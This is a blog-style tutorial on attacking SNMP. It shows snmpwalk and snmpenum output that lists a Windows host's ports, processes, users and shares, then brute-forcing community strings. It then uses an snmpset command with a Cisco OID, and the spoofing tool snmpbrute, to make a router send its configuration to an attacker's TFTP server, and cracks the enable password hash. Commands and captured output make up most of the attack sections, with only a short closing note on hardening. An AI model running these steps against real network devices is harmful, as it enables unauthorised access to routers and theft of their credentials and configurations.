SNMP Enumeration and Hacking

SNMP (Simple Network Management Protocol) is a protocol that never seems to get the attention it deserves. As a “security expert” I am quite ashamed to say, that I was not fully aware of all the intricate possibilities that lie within SNMP, until quite recently.

Once you get your hands dirty, SNMP can get quite interesting. Personally it really reminds me of “The Matrix”…with the ability to monitor almost anything, and alert about anomalies…
For those of you not up tp par with SNMP, I strongly recommend a quick read through:

http://www.chapo.co.il/articles/snmp/
http://net-snmp.sourceforge.net/
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm

This tutorial will assume you know your stuff, but just a few basic terms (taken from chapo.co.il):

· SNMP – (Simple Network Management Protocol) – an application-layer protocol for managing TCP/IP based networks. SNMP runs over UDP (which runs over IP).

· MIB – (Management Information Base) – provides a standard representation of the SNMP agent’s available information and where it is stored.

· NMS – (Network Management Station) – A device designed to poll SNMP agents for information.

· SNMP Agent – a device running some software that understands the language of SNMP. Almost any network device could potentially run SNMP, but typically you will find SNMP agents running on internetworking devices (eg. routers, hubs, switches, bridges). Some operating systems (UNIX, Windows NT) can also run SNMP agents.

The main problem with SNMP is that the authentication method (public and private community strings) is inherently weak, not to mention the fact the SNMP is based on UDP, which is prone to spoofing. So, we’ve got a weak protocol, often forgotten and misconfigured – a disaster just waiting to happen.
Just to get a taste of what kind on info SNMP can get, we’ll use snmpwalk – a linux based tool. (I’ve found Win32 ports for these tools, but I strongly suggest using Linux for this tutorial).

In the first example we will use “public” (the default) community string to enumerate a Windows Machine running SNMP.

 #snmpwalk -c public 192.168.0.222 (General Info) .iso.3.6.1.2.1.1.1.0 = "Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0" iso.3.6.1.2.1.6.13.1.2.192.168.0.222.139.0.0.0.0.59542 = IpAddress: 192.168.0.222 (Open Ports) .iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.59620 = 21 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.25.0.0.0.0.18484 = 25 .iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.59465 = 80 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.119.0.0.0.0.51385 = 119 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.26722 = 135 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.2272 = 443 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.43190 = 445 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.563.0.0.0.0.34828 = 563 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1025.0.0.0.0.10361 = 1025 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1026.0.0.0.0.18486 = 1026 .iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1029.0.0.0.0.18510 = 1029 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1755.0.0.0.0.10411 = 1755 .iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3372.0.0.0.0.2224 = 3372 iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.59426 = 3389 ..iso.3.6.1.2.1.6.13.1.3.192.168.0.222.139.0.0.0.0.59542 = 139 (Drives) iso.3.6.1.2.1.25.2.3.1.3.1 = "A:" .iso.3.6.1.2.1.25.2.3.1.3.2 = "C: Label: Serial Number 28a1a476" .iso.3.6.1.2.1.25.2.3.1.3.3 = "D: Label:W2KSEL_EN Serial Number 9ac432a9" iso.3.6.1.2.1.25.2.3.1.3.4 = "Virtual Memory" (Processes) iso.3.6.1.2.1.25.4.2.1.2.1 = "System Idle Process iso.3.6.1.2.1.25.4.2.1.2.8 = "System" iso.3.6.1.2.1.25.4.2.1.2.176 = "smss.exe" iso.3.6.1.2.1.25.4.2.1.2.200 = "csrss.exe" iso.3.6.1.2.1.25.4.2.1.2.224 = "winlogon.exe" iso.3.6.1.2.1.25.4.2.1.2.252 = "services.exe" iso.3.6.1.2.1.25.4.2.1.2.264 = "lsass.exe" iso.3.6.1.2.1.25.4.2.1.2.380 = "termsrv.exe" iso.3.6.1.2.1.25.4.2.1.2.500 = "svchost.exe" iso.3.6.1.2.1.25.4.2.1.2.532 = "SPOOLSV.EXE" iso.3.6.1.2.1.25.4.2.1.2.564 = "msdtc.exe" .iso.3.6.1.2.1.25.4.2.1.2.668 = "svchost.exe" iso.3.6.1.2.1.25.4.2.1.2.692 = "llssrv.exe" iso.3.6.1.2.1.25.4.2.1.2.768 = "NSPMON.exe" .iso.3.6.1.2.1.25.4.2.1.2.796 = "NSCM.exe" iso.3.6.1.2.1.25.4.2.1.2.868 = "regsvc.exe" .iso.3.6.1.2.1.25.4.2.1.2.908 = "mstask.exe" iso.3.6.1.2.1.25.4.2.1.2.960 = "VMwareService.e" iso.3.6.1.2.1.25.4.2.1.2.992 = "svchost.exe" iso.3.6.1.2.1.25.4.2.1.2.1020 = "dfssvc.exe" iso.3.6.1.2.1.25.4.2.1.2.1040 = "inetinfo.exe" iso.3.6.1.2.1.25.4.2.1.2.1056 = "nspm.exe" iso.3.6.1.2.1.25.4.2.1.2.1108 = "NSUM.exe" iso.3.6.1.2.1.25.4.2.1.2.1364 = "explorer.exe" iso.3.6.1.2.1.25.4.2.1.2.1544 = "VMwareTray.exe" iso.3.6.1.2.1.25.4.2.1.2.1572 = "VMwareUser.exe" iso.3.6.1.2.1.25.4.2.1.2.1600 = "cmd.exe" iso.3.6.1.2.1.25.4.2.1.2.1616 = "mdm.exe" iso.3.6.1.2.1.25.4.2.1.2.1660 = "mshta.exe" iso.3.6.1.2.1.25.4.2.1.2.1712 = "snmp.exe" iso.3.6.1.2.1.25.4.2.1.2.1724 = "snmptrap.exe" (Installed Apps) iso.3.6.1.2.1.25.6.3.1.2.1 = "Sentinel 2.0" iso.3.6.1.2.1.25.6.3.1.2.2 = "VMware Tools" iso.3.6.1.2.1.25.6.3.1.2.3 = "WebFldrs" #

We see that a simple walk on the standard MIB tree wield a whopping amount of information. By using specific vendor private mibs, more information can be found – as can be seen by using Filip Waeytens’ tool – SNMPEnum. Notice that “windows.txt” contains private MIB values for Microsoft Products.

 # perl snmpenum.pl Usage: perl enum.pl <IP-address> <community> <configfile> # perl snmpenum.pl 192.168.0.222 windows.txt SERVICES Server Alerter Event Log Messenger DNS Client DHCP Client Workstation SNMP Service Plug and Play ….. World Wide Web Publishing Service Distributed Transaction Coordinator Simple Mail Transport Protocol (SMTP) Network News Transport Protocol (NNTP) Windows Management Instrumentation Driver Extensions DISKS A: C: Label: Serial Number 28a1a476 D: Label:W2KSEL_EN Serial Number 9ac432a9 Virtual Memory LISTENING TCP PORTS 21 25 80 119 135 443 445 563 1025 1026 1029 1755 3372 3389 UPTIME 16 minutes, 52.92 LISTENING UDP PORTS 135 161 162 445 1028 1030 1755 3456 USERS Guest IUSR_LAB-SP3 IWAM_LAB-SP3 Administrator TsInternetUser NetShowServices DOMAIN WORKGROUP SYSTEM INFO Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free) HOSTNAME LAB-SP3 RUNNING PROCESSES System Idle Process System smss.exe csrss.exe winlogon.exe services.exe lsass.exe termsrv.exe svchost.exe … cmd.exe mdm.exe mshta.exe snmp.exe snmptrap.exe INSTALLED SOFTWARE Sentinel 2.0 VMware Tools WebFldrs SHARES MyShare C:Documents and SettingsAdministratorDesktopMyShare

Surprised? Yes…SNMP is a powerful enumeration tool. However, a common misconception is that SNMP is “read only”, and that no actual changes can be made using SNMP. This couldn’t be further from the truth as we will see in this next example.

The Community strings for SNMP can be brute forced, using a variety of tools (I heard rumors of a perl tool coming out soon J). I will be using the SNMP Bruteforce tool from the Solarwinds tool pack, to bruteforce the community strings of a router:

Once the read / write community string is found, we can use snmpset to download the router config file. Notice the syntax:

snmpset -c <RW community> <router hostname/IP>.1.3.6.1.4.1.9.2.1.55.<TFTP IP octet1>.<octet 2>.<octet 3>.<octet 4> string <path/file on TFTP server to save file to>

 # snmpset -c password 192.168.1.254 .1.3.6.1.4.1.9.2.1.55.192.168.1.232 s conf SNMPv2-SMI::enterprises.9.2.1.55.192.168.1.232 = STRING: "conf" # cat conf version 12.0 no service pad service timestamps debug uptime service timestamps log uptime no service password-encryption ! hostname Muts ! enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/ ! ip subnet-zero ! interface FastEthernet0/1 ……. interface FastEthernet0/24 ! ip default-gateway 192.168.1.138 snmp-server community password RW snmp-server community test RO ! line con 0 transport input none stopbits 1 line vty 0 4 password muts login line vty 5 15 password muts login ! end # 

We have downloaded the config file, with all the configuration parameters of the router (well, it’s a switch, but same-same). We see the snmp and vty passwords in clear text, however, the enable password is encrypted. We can use john the ripper to brute this hash. We’ll be taking the encrypted password, and formatting it in a text file, similar to the format of unix shadow files.

Once this is done we run john on this file, and wait for the password to be found:

We have now found the enable password to the router. We can log on using “muts” and “mutz” as the password and enable password respectively.

A nice bruteforcer, spoofer and automatic config downloader called snmpbrute (found in packetstorm) will actually bruteforce and copy the router config file to a TFTP server, assuming the correct community name is found.

 #snmpbrute -s 192.168.1.254 -d 192.168.1.254 -w word.txt -m 2 -t 192.168.1.232 Ok, spoofing packets from 192.168.1.254 to 192.168.1.254 with wordlist word.txt (Delay: 200) TFTP Address:192.168.1.232 Size is 39 Read 6 words/lines Address of tftp server is 192.168.1.232 # cat running-config ! version 12.0 no service pad service timestamps debug uptime service timestamps log uptime no service password-encryption ! hostname Muts ! enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/ ! ip subnet-zero ! interface FastEthernet0/1 … interface FastEthernet0/24 ! interface VLAN1 ip address 192.168.1.254 255.255.255.0 no ip directed-broadcast no ip route-cache ! ip default-gateway 192.168.1.138 snmp-server engineID local 0000000902000003E3645800 snmp-server community password RW snmp-server community test RO ! line con 0 transport input none stopbits 1 line vty 0 4 password muts login line vty 5 15 password muts login ! end # 

IMHO, Solarwinds has got the most complete set of SNMP security / testing tools. Just a few more screenshots of Solarwinds, to get the curiosity running.. ..

Summary and Conclusion
Since SNMP is not usually audited, and may pose a significant threat if left misconfigured, it is considered a “high risk” protocol. If you have to use it, make sure to use strong community passwords, and configure SNMP access lists accordingly. If you have an option, consider using SNMP v.3.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

<span>%d</span> bloggers like this: